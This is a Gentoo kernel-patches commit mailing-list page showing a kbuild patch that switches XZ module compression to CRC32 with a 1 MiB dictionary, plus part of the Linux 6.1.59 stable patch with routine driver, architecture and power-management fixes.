Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Oct 22 22:52:32 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Oct 22 22:52:32 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1b5d1974

kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |  4 +++
 2950_kbuild-CRC32-1MB-dict-xz-modules.patch | 38 +++++++++++++++++++++++++++++
 2 files changed, 42 insertions(+)

diff --git a/0000_README b/0000_README
index 455e85da..2db06d5c 100644
--- a/0000_README
+++ b/0000_README
@@ -315,6 +315,10 @@ Patch:  2940_handle-gcc-14-last-stmt-rename.patch
 From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
 Desc:   gcc-plugins: Rename last_stmt() for GCC 14+
 
+Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
+Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2950_kbuild-CRC32-1MB-dict-xz-modules.patch b/2950_kbuild-CRC32-1MB-dict-xz-modules.patch
new file mode 100644
index 00000000..32090343
--- /dev/null
+++ b/2950_kbuild-CRC32-1MB-dict-xz-modules.patch
@@ -0,0 +1,38 @@
+From fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28 Mon Sep 17 00:00:00 2001
+From: Martin Nybo Andersen <tweek@tweek.dk>
+Date: Fri, 15 Sep 2023 12:15:39 +0200
+Subject: kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
+
+Kmod is now (since kmod commit 09c9f8c5df04 ("libkmod: Use kernel
+decompression when available")) using the kernel decompressor, when
+loading compressed modules.
+
+However, the kernel XZ decompressor is XZ Embedded, which doesn't
+handle CRC64 and dictionaries larger than 1MiB.
+
+Use CRC32 and 1MiB dictionary when XZ compressing and installing
+kernel modules.
+
+Link: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1050582
+Signed-off-by: Martin Nybo Andersen <tweek@tweek.dk>
+Signed-off-by: Masahiro Yamada <masahiroy@kernel.org>
+---
+ scripts/Makefile.modinst | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/scripts/Makefile.modinst b/scripts/Makefile.modinst
+index 346f5ec506823..0afd75472679f 100644
+--- a/scripts/Makefile.modinst
++++ b/scripts/Makefile.modinst
+@@ -144,7 +144,7 @@ endif
+ quiet_cmd_gzip = GZIP    $@
+       cmd_gzip = $(KGZIP) -n -f $<
+ quiet_cmd_xz = XZ      $@
+-      cmd_xz = $(XZ) --lzma2=dict=2MiB -f $<
++      cmd_xz = $(XZ) --check=crc32 --lzma2=dict=1MiB -f $<
+ quiet_cmd_zstd = ZSTD    $@
+       cmd_zstd = $(ZSTD) -T0 --rm -f -q $<
+ 
+-- 
+cgit 
+
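
For reference, the one-line Makefile.modinst change above means modules installed by "make modules_install" are compressed with a CRC32 integrity check and a 1 MiB LZMA2 dictionary instead of the xz defaults (CRC64 and a larger dictionary), neither of which the kernel's XZ Embedded decompressor handles. A rough hand-run equivalent, assuming an installed module tree (the module path is purely illustrative):

    # Compress a module the way the patched rule does; CRC32 plus a
    # 1 MiB dictionary keep it loadable through the in-kernel XZ Embedded
    # decompressor that newer kmod relies on.
    xz --check=crc32 --lzma2=dict=1MiB -f /lib/modules/$(uname -r)/extra/example.ko

    # Inspect the stream; the Check column should now read CRC32.
    xz --list /lib/modules/$(uname -r)/extra/example.ko.xz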


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-19 22:30 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-19 22:30 UTC (permalink / raw
  To: gentoo-commits

commit:     37b40057a74e9cab83bcd5c894920f0251d64c17
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Oct 19 22:25:18 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Oct 19 22:25:18 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=37b40057

Linux patch 6.1.59

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1058_linux-6.1.59.patch | 4902 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4906 insertions(+)

diff --git a/0000_README b/0000_README
index 1d0e038f..455e85da 100644
--- a/0000_README
+++ b/0000_README
@@ -275,6 +275,10 @@ Patch:  1057_linux-6.1.58.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.58
 
+Patch:  1058_linux-6.1.59.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.59
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1058_linux-6.1.59.patch b/1058_linux-6.1.59.patch
new file mode 100644
index 00000000..5d22b412
--- /dev/null
+++ b/1058_linux-6.1.59.patch
@@ -0,0 +1,4902 @@
+diff --git a/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml b/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml
+index 33b90e975e33c..ea7db3618b23e 100644
+--- a/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml
++++ b/Documentation/devicetree/bindings/interrupt-controller/renesas,rzg2l-irqc.yaml
+@@ -31,8 +31,9 @@ properties:
+       - const: renesas,rzg2l-irqc
+ 
+   '#interrupt-cells':
+-    description: The first cell should contain external interrupt number (IRQ0-7) and the
+-                 second cell is used to specify the flag.
++    description: The first cell should contain a macro RZG2L_{NMI,IRQX} included in the
++                 include/dt-bindings/interrupt-controller/irqc-rzg2l.h and the second
++                 cell is used to specify the flag.
+     const: 2
+ 
+   '#address-cells':
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index f5f7a464605f9..b47b3d0ce5596 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -967,6 +967,21 @@ tcp_tw_reuse - INTEGER
+ tcp_window_scaling - BOOLEAN
+ 	Enable window scaling as defined in RFC1323.
+ 
++tcp_shrink_window - BOOLEAN
++	This changes how the TCP receive window is calculated.
++
++	RFC 7323, section 2.4, says there are instances when a retracted
++	window can be offered, and that TCP implementations MUST ensure
++	that they handle a shrinking window, as specified in RFC 1122.
++
++	- 0 - Disabled.	The window is never shrunk.
++	- 1 - Enabled.	The window is shrunk when necessary to remain within
++			the memory limit set by autotuning (sk_rcvbuf).
++			This only occurs if a non-zero receive window
++			scaling factor is also in effect.
++
++	Default: 0
++
+ tcp_wmem - vector of 3 INTEGERs: min, default, max
+ 	min: Amount of memory reserved for send buffers for TCP sockets.
+ 	Each TCP socket has rights to use it due to fact of its birth.
+diff --git a/Makefile b/Makefile
+index ce1eec0b5010d..4ad29c852e5f8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 58
++SUBLEVEL = 59
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+index dec85d2548384..5117b2e7985af 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+@@ -48,7 +48,7 @@
+ 
+ 	memory@40000000 {
+ 		device_type = "memory";
+-		reg = <0 0x40000000 0 0x80000000>;
++		reg = <0 0x40000000 0x2 0x00000000>;
+ 	};
+ 
+ 	reserved-memory {
+@@ -56,13 +56,8 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		/* 2 MiB reserved for ARM Trusted Firmware (BL31) */
+-		bl31_secmon_reserved: secmon@54600000 {
+-			no-map;
+-			reg = <0 0x54600000 0x0 0x200000>;
+-		};
+-
+-		/* 12 MiB reserved for OP-TEE (BL32)
++		/*
++		 * 12 MiB reserved for OP-TEE (BL32)
+ 		 * +-----------------------+ 0x43e0_0000
+ 		 * |      SHMEM 2MiB       |
+ 		 * +-----------------------+ 0x43c0_0000
+@@ -75,6 +70,34 @@
+ 			no-map;
+ 			reg = <0 0x43200000 0 0x00c00000>;
+ 		};
++
++		scp_mem: memory@50000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x50000000 0 0x2900000>;
++			no-map;
++		};
++
++		vpu_mem: memory@53000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x53000000 0 0x1400000>; /* 20 MB */
++		};
++
++		/* 2 MiB reserved for ARM Trusted Firmware (BL31) */
++		bl31_secmon_mem: memory@54600000 {
++			no-map;
++			reg = <0 0x54600000 0x0 0x200000>;
++		};
++
++		snd_dma_mem: memory@60000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x60000000 0 0x1100000>;
++			no-map;
++		};
++
++		apu_mem: memory@62000000 {
++			compatible = "shared-dma-pool";
++			reg = <0 0x62000000 0 0x1400000>; /* 20 MB */
++		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 2c2b946b614bf..ef2764a595eda 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -229,6 +229,7 @@
+ 		interrupts = <GIC_SPI 18 IRQ_TYPE_LEVEL_HIGH 0>;
+ 		cpus = <&cpu0>, <&cpu1>, <&cpu2>, <&cpu3>,
+ 		       <&cpu4>, <&cpu5>, <&cpu6>, <&cpu7>;
++		status = "fail";
+ 	};
+ 
+ 	dmic_codec: dmic-codec {
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index f049fb42e3ca8..de794a5078dfc 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3701,7 +3701,7 @@
+ 
+ 		pdc: interrupt-controller@b220000 {
+ 			compatible = "qcom,sm8150-pdc", "qcom,pdc";
+-			reg = <0 0x0b220000 0 0x400>;
++			reg = <0 0x0b220000 0 0x30000>;
+ 			qcom,pdc-ranges = <0 480 94>, <94 609 31>,
+ 					  <125 63 1>;
+ 			#interrupt-cells = <2>;
+diff --git a/arch/powerpc/include/asm/nohash/32/pte-8xx.h b/arch/powerpc/include/asm/nohash/32/pte-8xx.h
+index 1a89ebdc3acc9..0238e6bd0d6c1 100644
+--- a/arch/powerpc/include/asm/nohash/32/pte-8xx.h
++++ b/arch/powerpc/include/asm/nohash/32/pte-8xx.h
+@@ -94,6 +94,13 @@ static inline pte_t pte_wrprotect(pte_t pte)
+ 
+ #define pte_wrprotect pte_wrprotect
+ 
++static inline int pte_read(pte_t pte)
++{
++	return (pte_val(pte) & _PAGE_RO) != _PAGE_NA;
++}
++
++#define pte_read pte_read
++
+ static inline int pte_write(pte_t pte)
+ {
+ 	return !(pte_val(pte) & _PAGE_RO);
+diff --git a/arch/powerpc/include/asm/nohash/64/pgtable.h b/arch/powerpc/include/asm/nohash/64/pgtable.h
+index 879e9a6e5a870..00a003d367523 100644
+--- a/arch/powerpc/include/asm/nohash/64/pgtable.h
++++ b/arch/powerpc/include/asm/nohash/64/pgtable.h
+@@ -197,7 +197,7 @@ static inline int __ptep_test_and_clear_young(struct mm_struct *mm,
+ {
+ 	unsigned long old;
+ 
+-	if (pte_young(*ptep))
++	if (!pte_young(*ptep))
+ 		return 0;
+ 	old = pte_update(mm, addr, ptep, _PAGE_ACCESSED, 0, 0);
+ 	return (old & _PAGE_ACCESSED) != 0;
+diff --git a/arch/powerpc/include/asm/nohash/pgtable.h b/arch/powerpc/include/asm/nohash/pgtable.h
+index d9067dfc531cc..3d7dce90863c2 100644
+--- a/arch/powerpc/include/asm/nohash/pgtable.h
++++ b/arch/powerpc/include/asm/nohash/pgtable.h
+@@ -25,7 +25,9 @@ static inline int pte_write(pte_t pte)
+ 	return pte_val(pte) & _PAGE_RW;
+ }
+ #endif
++#ifndef pte_read
+ static inline int pte_read(pte_t pte)		{ return 1; }
++#endif
+ static inline int pte_dirty(pte_t pte)		{ return pte_val(pte) & _PAGE_DIRTY; }
+ static inline int pte_special(pte_t pte)	{ return pte_val(pte) & _PAGE_SPECIAL; }
+ static inline int pte_none(pte_t pte)		{ return (pte_val(pte) & ~_PTE_NONE_MASK) == 0; }
+diff --git a/arch/powerpc/kernel/entry_32.S b/arch/powerpc/kernel/entry_32.S
+index 3fc7c9886bb70..d4fc546762db4 100644
+--- a/arch/powerpc/kernel/entry_32.S
++++ b/arch/powerpc/kernel/entry_32.S
+@@ -135,8 +135,9 @@ ret_from_syscall:
+ 	lis	r4,icache_44x_need_flush@ha
+ 	lwz	r5,icache_44x_need_flush@l(r4)
+ 	cmplwi	cr0,r5,0
+-	bne-	2f
++	bne-	.L44x_icache_flush
+ #endif /* CONFIG_PPC_47x */
++.L44x_icache_flush_return:
+ 	kuep_unlock
+ 	lwz	r4,_LINK(r1)
+ 	lwz	r5,_CCR(r1)
+@@ -170,10 +171,11 @@ syscall_exit_finish:
+ 	b	1b
+ 
+ #ifdef CONFIG_44x
+-2:	li	r7,0
++.L44x_icache_flush:
++	li	r7,0
+ 	iccci	r0,r0
+ 	stw	r7,icache_44x_need_flush@l(r4)
+-	b	1b
++	b	.L44x_icache_flush_return
+ #endif  /* CONFIG_44x */
+ 
+ 	.globl	ret_from_fork
+diff --git a/arch/riscv/net/bpf_jit_comp64.c b/arch/riscv/net/bpf_jit_comp64.c
+index f2417ac54edd6..8f5d3c57d58ad 100644
+--- a/arch/riscv/net/bpf_jit_comp64.c
++++ b/arch/riscv/net/bpf_jit_comp64.c
+@@ -236,7 +236,7 @@ static void __build_epilogue(bool is_tail_call, struct rv_jit_context *ctx)
+ 	emit_addi(RV_REG_SP, RV_REG_SP, stack_adjust, ctx);
+ 	/* Set return value. */
+ 	if (!is_tail_call)
+-		emit_mv(RV_REG_A0, RV_REG_A5, ctx);
++		emit_addiw(RV_REG_A0, RV_REG_A5, 0, ctx);
+ 	emit_jalr(RV_REG_ZERO, is_tail_call ? RV_REG_T3 : RV_REG_RA,
+ 		  is_tail_call ? 4 : 0, /* skip TCC init */
+ 		  ctx);
+@@ -428,12 +428,12 @@ static void emit_sext_32_rd(u8 *rd, struct rv_jit_context *ctx)
+ 	*rd = RV_REG_T2;
+ }
+ 
+-static int emit_jump_and_link(u8 rd, s64 rvoff, bool force_jalr,
++static int emit_jump_and_link(u8 rd, s64 rvoff, bool fixed_addr,
+ 			      struct rv_jit_context *ctx)
+ {
+ 	s64 upper, lower;
+ 
+-	if (rvoff && is_21b_int(rvoff) && !force_jalr) {
++	if (rvoff && fixed_addr && is_21b_int(rvoff)) {
+ 		emit(rv_jal(rd, rvoff >> 1), ctx);
+ 		return 0;
+ 	} else if (in_auipc_jalr_range(rvoff)) {
+@@ -454,24 +454,17 @@ static bool is_signed_bpf_cond(u8 cond)
+ 		cond == BPF_JSGE || cond == BPF_JSLE;
+ }
+ 
+-static int emit_call(bool fixed, u64 addr, struct rv_jit_context *ctx)
++static int emit_call(u64 addr, bool fixed_addr, struct rv_jit_context *ctx)
+ {
+ 	s64 off = 0;
+ 	u64 ip;
+-	u8 rd;
+-	int ret;
+ 
+ 	if (addr && ctx->insns) {
+ 		ip = (u64)(long)(ctx->insns + ctx->ninsns);
+ 		off = addr - ip;
+ 	}
+ 
+-	ret = emit_jump_and_link(RV_REG_RA, off, !fixed, ctx);
+-	if (ret)
+-		return ret;
+-	rd = bpf_to_rv_reg(BPF_REG_0, ctx);
+-	emit_mv(rd, RV_REG_A0, ctx);
+-	return 0;
++	return emit_jump_and_link(RV_REG_RA, off, fixed_addr, ctx);
+ }
+ 
+ static void emit_atomic(u8 rd, u8 rs, s16 off, s32 imm, bool is64,
+@@ -913,7 +906,7 @@ out_be:
+ 	/* JUMP off */
+ 	case BPF_JMP | BPF_JA:
+ 		rvoff = rv_offset(i, off, ctx);
+-		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, false, ctx);
++		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, true, ctx);
+ 		if (ret)
+ 			return ret;
+ 		break;
+@@ -1032,17 +1025,21 @@ out_be:
+ 	/* function call */
+ 	case BPF_JMP | BPF_CALL:
+ 	{
+-		bool fixed;
++		bool fixed_addr;
+ 		u64 addr;
+ 
+ 		mark_call(ctx);
+-		ret = bpf_jit_get_func_addr(ctx->prog, insn, extra_pass, &addr,
+-					    &fixed);
++		ret = bpf_jit_get_func_addr(ctx->prog, insn, extra_pass,
++					    &addr, &fixed_addr);
+ 		if (ret < 0)
+ 			return ret;
+-		ret = emit_call(fixed, addr, ctx);
++
++		ret = emit_call(addr, fixed_addr, ctx);
+ 		if (ret)
+ 			return ret;
++
++		if (insn->src_reg != BPF_PSEUDO_CALL)
++			emit_mv(bpf_to_rv_reg(BPF_REG_0, ctx), RV_REG_A0, ctx);
+ 		break;
+ 	}
+ 	/* tail call */
+@@ -1057,7 +1054,7 @@ out_be:
+ 			break;
+ 
+ 		rvoff = epilogue_offset(ctx);
+-		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, false, ctx);
++		ret = emit_jump_and_link(RV_REG_ZERO, rvoff, true, ctx);
+ 		if (ret)
+ 			return ret;
+ 		break;
+diff --git a/arch/x86/events/utils.c b/arch/x86/events/utils.c
+index 76b1f8bb0fd5f..dab4ed199227f 100644
+--- a/arch/x86/events/utils.c
++++ b/arch/x86/events/utils.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <asm/insn.h>
++#include <linux/mm.h>
+ 
+ #include "perf_event.h"
+ 
+@@ -132,9 +133,9 @@ static int get_branch_type(unsigned long from, unsigned long to, int abort,
+ 		 * The LBR logs any address in the IP, even if the IP just
+ 		 * faulted. This means userspace can control the from address.
+ 		 * Ensure we don't blindly read any address by validating it is
+-		 * a known text address.
++		 * a known text address and not a vsyscall address.
+ 		 */
+-		if (kernel_text_address(from)) {
++		if (kernel_text_address(from) && !in_gate_area_no_mm(from)) {
+ 			addr = (void *)from;
+ 			/*
+ 			 * Assume we can get the maximum possible size
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 52d8c67d93081..016fb500b3a6f 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -635,12 +635,17 @@
+ /* AMD Last Branch Record MSRs */
+ #define MSR_AMD64_LBR_SELECT			0xc000010e
+ 
+-/* Fam 17h MSRs */
+-#define MSR_F17H_IRPERF			0xc00000e9
++/* Zen4 */
++#define MSR_ZEN4_BP_CFG			0xc001102e
++#define MSR_ZEN4_BP_CFG_SHARED_BTB_FIX_BIT 5
+ 
++/* Zen 2 */
+ #define MSR_ZEN2_SPECTRAL_CHICKEN	0xc00110e3
+ #define MSR_ZEN2_SPECTRAL_CHICKEN_BIT	BIT_ULL(1)
+ 
++/* Fam 17h MSRs */
++#define MSR_F17H_IRPERF			0xc00000e9
++
+ /* Fam 16h MSRs */
+ #define MSR_F16H_L2I_PERF_CTL		0xc0010230
+ #define MSR_F16H_L2I_PERF_CTR		0xc0010231
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index d1d92897ed6be..46b7ee0ab01a4 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -270,6 +270,17 @@ void __init_or_module noinline apply_alternatives(struct alt_instr *start,
+ 	u8 insn_buff[MAX_PATCH_LEN];
+ 
+ 	DPRINTK("alt table %px, -> %px", start, end);
++
++	/*
++	 * In the case CONFIG_X86_5LEVEL=y, KASAN_SHADOW_START is defined using
++	 * cpu_feature_enabled(X86_FEATURE_LA57) and is therefore patched here.
++	 * During the process, KASAN becomes confused seeing partial LA57
++	 * conversion and triggers a false-positive out-of-bound report.
++	 *
++	 * Disable KASAN until the patching is complete.
++	 */
++	kasan_disable_current();
++
+ 	/*
+ 	 * The scan order should be from start to end. A later scanned
+ 	 * alternative code can overwrite previously scanned alternative code.
+@@ -337,6 +348,8 @@ void __init_or_module noinline apply_alternatives(struct alt_instr *start,
+ next:
+ 		optimize_nops(instr, a->instrlen);
+ 	}
++
++	kasan_enable_current();
+ }
+ 
+ static inline bool is_jcc32(struct insn *insn)
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index f240c978d85e4..b66960358381b 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -80,6 +80,10 @@ static const int amd_div0[] =
+ 	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x00, 0x0, 0x2f, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0x50, 0x0, 0x5f, 0xf));
+ 
++static const int amd_erratum_1485[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x19, 0x10, 0x0, 0x1f, 0xf),
++			   AMD_MODEL_RANGE(0x19, 0x60, 0x0, 0xaf, 0xf));
++
+ static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
+ {
+ 	int osvw_id = *erratum++;
+@@ -1125,6 +1129,10 @@ static void init_amd(struct cpuinfo_x86 *c)
+ 		pr_notice_once("AMD Zen1 DIV0 bug detected. Disable SMT for full protection.\n");
+ 		setup_force_cpu_bug(X86_BUG_DIV0);
+ 	}
++
++	if (!cpu_has(c, X86_FEATURE_HYPERVISOR) &&
++	     cpu_has_amd_erratum(c, amd_erratum_1485))
++		msr_set_bit(MSR_ZEN4_BP_CFG, MSR_ZEN4_BP_CFG_SHARED_BTB_FIX_BIT);
+ }
+ 
+ #ifdef CONFIG_X86_32
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index ee4c812c8f6cc..8bb233d2d1e48 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1886,6 +1886,17 @@ static const struct dmi_system_id ec_dmi_table[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "HP 15-cx0041ur"),
+ 		},
+ 	},
++	{
++		/*
++		 * HP Pavilion Gaming Laptop 15-dk1xxx
++		 * https://github.com/systemd/systemd/issues/28942
++		 */
++		.callback = ec_honor_dsdt_gpe,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Gaming Laptop 15-dk1xxx"),
++		},
++	},
+ 	{
+ 		/*
+ 		 * Samsung hardware
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index a7f12bdbc5e25..af6fa801d1ed8 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -439,6 +439,13 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "S5602ZA"),
+ 		},
+ 	},
++	{
++		.ident = "Asus ExpertBook B1402CBA",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B1402CBA"),
++		},
++	},
+ 	{
+ 		.ident = "Asus ExpertBook B2402CBA",
+ 		.matches = {
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 6a053cd0cf410..fbc231a3f7951 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -1943,6 +1943,96 @@ retry:
+ 	return rc;
+ }
+ 
++/**
++ *	ata_dev_power_set_standby - Set a device power mode to standby
++ *	@dev: target device
++ *
++ *	Issue a STANDBY IMMEDIATE command to set a device power mode to standby.
++ *	For an HDD device, this spins down the disks.
++ *
++ *	LOCKING:
++ *	Kernel thread context (may sleep).
++ */
++void ata_dev_power_set_standby(struct ata_device *dev)
++{
++	unsigned long ap_flags = dev->link->ap->flags;
++	struct ata_taskfile tf;
++	unsigned int err_mask;
++
++	/* Issue STANDBY IMMEDIATE command only if supported by the device */
++	if (dev->class != ATA_DEV_ATA && dev->class != ATA_DEV_ZAC)
++		return;
++
++	/*
++	 * Some odd clown BIOSes issue spindown on power off (ACPI S4 or S5)
++	 * causing some drives to spin up and down again. For these, do nothing
++	 * if we are being called on shutdown.
++	 */
++	if ((ap_flags & ATA_FLAG_NO_POWEROFF_SPINDOWN) &&
++	    system_state == SYSTEM_POWER_OFF)
++		return;
++
++	if ((ap_flags & ATA_FLAG_NO_HIBERNATE_SPINDOWN) &&
++	    system_entering_hibernation())
++		return;
++
++	ata_tf_init(dev, &tf);
++	tf.flags |= ATA_TFLAG_DEVICE | ATA_TFLAG_ISADDR;
++	tf.protocol = ATA_PROT_NODATA;
++	tf.command = ATA_CMD_STANDBYNOW1;
++
++	ata_dev_notice(dev, "Entering standby power mode\n");
++
++	err_mask = ata_exec_internal(dev, &tf, NULL, DMA_NONE, NULL, 0, 0);
++	if (err_mask)
++		ata_dev_err(dev, "STANDBY IMMEDIATE failed (err_mask=0x%x)\n",
++			    err_mask);
++}
++
++/**
++ *	ata_dev_power_set_active -  Set a device power mode to active
++ *	@dev: target device
++ *
++ *	Issue a VERIFY command to enter to ensure that the device is in the
++ *	active power mode. For a spun-down HDD (standby or idle power mode),
++ *	the VERIFY command will complete after the disk spins up.
++ *
++ *	LOCKING:
++ *	Kernel thread context (may sleep).
++ */
++void ata_dev_power_set_active(struct ata_device *dev)
++{
++	struct ata_taskfile tf;
++	unsigned int err_mask;
++
++	/*
++	 * Issue READ VERIFY SECTORS command for 1 sector at lba=0 only
++	 * if supported by the device.
++	 */
++	if (dev->class != ATA_DEV_ATA && dev->class != ATA_DEV_ZAC)
++		return;
++
++	ata_tf_init(dev, &tf);
++	tf.flags |= ATA_TFLAG_DEVICE | ATA_TFLAG_ISADDR;
++	tf.protocol = ATA_PROT_NODATA;
++	tf.command = ATA_CMD_VERIFY;
++	tf.nsect = 1;
++	if (dev->flags & ATA_DFLAG_LBA) {
++		tf.flags |= ATA_TFLAG_LBA;
++		tf.device |= ATA_LBA;
++	} else {
++		/* CHS */
++		tf.lbal = 0x1; /* sect */
++	}
++
++	ata_dev_notice(dev, "Entering active power mode\n");
++
++	err_mask = ata_exec_internal(dev, &tf, NULL, DMA_NONE, NULL, 0, 0);
++	if (err_mask)
++		ata_dev_err(dev, "VERIFY failed (err_mask=0x%x)\n",
++			    err_mask);
++}
++
+ /**
+  *	ata_read_log_page - read a specific log page
+  *	@dev: target device
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 6d4c80b6daaef..2a04dd36a4948 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -106,6 +106,14 @@ static const unsigned int ata_eh_flush_timeouts[] = {
+ 	UINT_MAX,
+ };
+ 
++static const unsigned int ata_eh_pm_timeouts[] = {
++	10000,	/* most drives spin up by 10sec */
++	10000,	/* > 99% working drives spin up before 20sec */
++	35000,	/* give > 30 secs of idleness for outlier devices */
++	 5000,	/* and sweet one last chance */
++	UINT_MAX, /* > 1 min has elapsed, give up */
++};
++
+ static const unsigned int ata_eh_other_timeouts[] = {
+ 	 5000,	/* same rationale as identify timeout */
+ 	10000,	/* ditto */
+@@ -147,6 +155,8 @@ ata_eh_cmd_timeout_table[ATA_EH_CMD_TIMEOUT_TABLE_SIZE] = {
+ 	  .timeouts = ata_eh_other_timeouts, },
+ 	{ .commands = CMDS(ATA_CMD_FLUSH, ATA_CMD_FLUSH_EXT),
+ 	  .timeouts = ata_eh_flush_timeouts },
++	{ .commands = CMDS(ATA_CMD_VERIFY),
++	  .timeouts = ata_eh_pm_timeouts },
+ };
+ #undef CMDS
+ 
+@@ -498,7 +508,19 @@ static void ata_eh_unload(struct ata_port *ap)
+ 	struct ata_device *dev;
+ 	unsigned long flags;
+ 
+-	/* Restore SControl IPM and SPD for the next driver and
++	/*
++	 * Unless we are restarting, transition all enabled devices to
++	 * standby power mode.
++	 */
++	if (system_state != SYSTEM_RESTART) {
++		ata_for_each_link(link, ap, PMP_FIRST) {
++			ata_for_each_dev(dev, link, ENABLED)
++				ata_dev_power_set_standby(dev);
++		}
++	}
++
++	/*
++	 * Restore SControl IPM and SPD for the next driver and
+ 	 * disable attached devices.
+ 	 */
+ 	ata_for_each_link(link, ap, PMP_FIRST) {
+@@ -687,6 +709,10 @@ void ata_scsi_port_error_handler(struct Scsi_Host *host, struct ata_port *ap)
+ 				ehc->saved_xfer_mode[devno] = dev->xfer_mode;
+ 				if (ata_ncq_enabled(dev))
+ 					ehc->saved_ncq_enabled |= 1 << devno;
++
++				/* If we are resuming, wake up the device */
++				if (ap->pflags & ATA_PFLAG_RESUMING)
++					ehc->i.dev_action[devno] |= ATA_EH_SET_ACTIVE;
+ 			}
+ 		}
+ 
